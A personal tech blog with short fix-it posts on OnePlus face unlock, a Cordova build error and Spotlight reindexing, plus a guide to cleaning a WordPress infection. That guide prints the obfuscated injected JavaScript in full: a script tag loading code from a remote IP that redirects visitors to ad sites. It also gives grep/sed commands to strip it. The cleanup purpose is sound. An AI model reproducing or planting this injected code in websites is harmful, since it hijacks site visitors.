Mahdi Hazaveh

Fix: OnePlus 5T Face Unlock Slow Down

Did your shiny Oneplus 5T Face Unlock slow down? I still remember how instant I could get to the home screen once I setup my face unlock on my brand new Oneplus 5T a month ago, but few days back I got to notice that there is a delay between when Facial recognition is done and when the phone unlocks.

This wasn’t about the process of Face Recognition, I knew the Face Unlock was still fast but what I was experiencing was seeing a slow sliding animation of unlocking the phone.

In the beginning I thought it was due some update, maybe OnePlus has added some more security measurement to the process, a week ago when one of my colleagues bought a 5T.

His brand new setup was running on the latest Oxygen OS and the Face Unlock was fast. this made me think about what could be on my phone and not on his that causes this issue and the only thing I could think of was my launcher. I am not using the Default launcher shipped by OnePlus on my device, I am running on Microsoft Launcher, so I thought that’s it, catch ya. But I eventually realised that the devilish animation is not coming from my launcher either.

Well after some search it turned out that the issue was due to change in animation speeds in my phone when I activated my Developer mode. I do not remember changing any of these settings but looks like activating developer mode made following settings to get the default value of 1x.

So if you are experiencing slow face unlock or finger print process on your OnePlus 5T and you’ve activated the developer mode sometime during your usage, I highly suggest you to have a look at these settings.

Fix Cordova issue with Gradle Wrapper missing From Android SDK in MAC.

Out of the sudden I was not able to build and run my cordova projects on my android phone by getting “Error: Could not find gradle wrapper within Android SDK. Might need to update your Android SDK.” .

It was not a normal SDK issue. after looking around it turned out that Google has changed the location of gardle wrapper in their sdk which was causing cordova not being able to find it. thus trying to run / build the apk was giving out the below output:

ANDROID_HOME=/Users/mahdi/Library/Android/sdk
JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_121.jdk/Contents/Home
Error: Could not find gradle wrapper within Android SDK. Might need to update your Android SDK.
Looked here: /Users/mahdi/Library/Android/sdk/tools/templates/gradle/wrapper

ANDROID_HOME=/Users/mahdi/Library/Android/sdk

JAVA_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_121.jdk/Contents/Home

Error: Could not find gradle wrapper within Android SDK. Might need to update your Android SDK.

Looked here: /Users/mahdi/Library/Android/sdk/tools/templates/gradle/wrapper

Blame is on Google but it seems Apache has fixed this issue in the next version of android-platform for cordova. so if you are one of the victims of errors above you can do this to solve your problem.

# cordova platform rm android
# cordova platform add https://github.com/apache/cordova-android

1 2	# cordova platform rm android # cordova platform add https://github.com/apache/cordova-android

lets hope this helps some people out there, stuck searching over a solution like me.

Reindex Spotlight and All My Files

Spotlight and All My Files can be a real time saver tool on mac but if you are a developer with lots of junk scripts within your project that can go messy. luckily we are able to exclude folders and files in spotlight privacy settings, but adding them to the privacy section will not immediately remove them from spotlight index.

The solution to this is to manually force spotlight to rebuild the index by executing following command in terminal:

sudo mdutil -E /

1	sudo mdutil -E /

running this alone is not enough tough. make sure you restart your mac and it should help with spotlight respecting your privacy setting.

Cleanup!

recently I have been experiencing few important breakthrough moments of my life, which led me to look at things from a different perspective, thus many things that used to fit in my previous believe system are now wrong.

So I have decided to remove some of the older posts of my blog which I no longer agree with their contents.

with the hope that no one ever is in need to read those old material, I would like to wish you all a great weekend.

removing wordpress malware infecting js files.

A recent WordPress malware is targeting WordPress websites by injecting a piece of malicious code into every single JavaScript files (mostly libraries specially Jquery) which acts maliciously by redirecting the visitors to advertising affiliate sites.

Example injected code:

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

Well I came to know about this when a client approached me to clean his hacked website. after looking for this pattern within the files on his WordPress directory I came to find that over 600 Javascript files were injected with the code above.

I have gotten the above result by doing a grep in the public_html folder. following command was used to do a recursive grep looking for matching malicious variable name:

grep -rnw . -e '_0xaae8'

1	grep -rnw . -e '_0xaae8'

looking at the above commands result I found a file named db.php was uploaded to one of the plugins folder which a simple get request to that php file would case of that mass injection to all javascript files.

now lets get rid of the bad stuff in all files by using sed in combination of grep command as below:

grep -rl  '_0xaae8' . | xargs sed -i 's/var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))/ /g'

grep -rl '_0xaae8' . | xargs sed -i 's/var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))/ /g'

This will remove the pattern from each single file that contains it.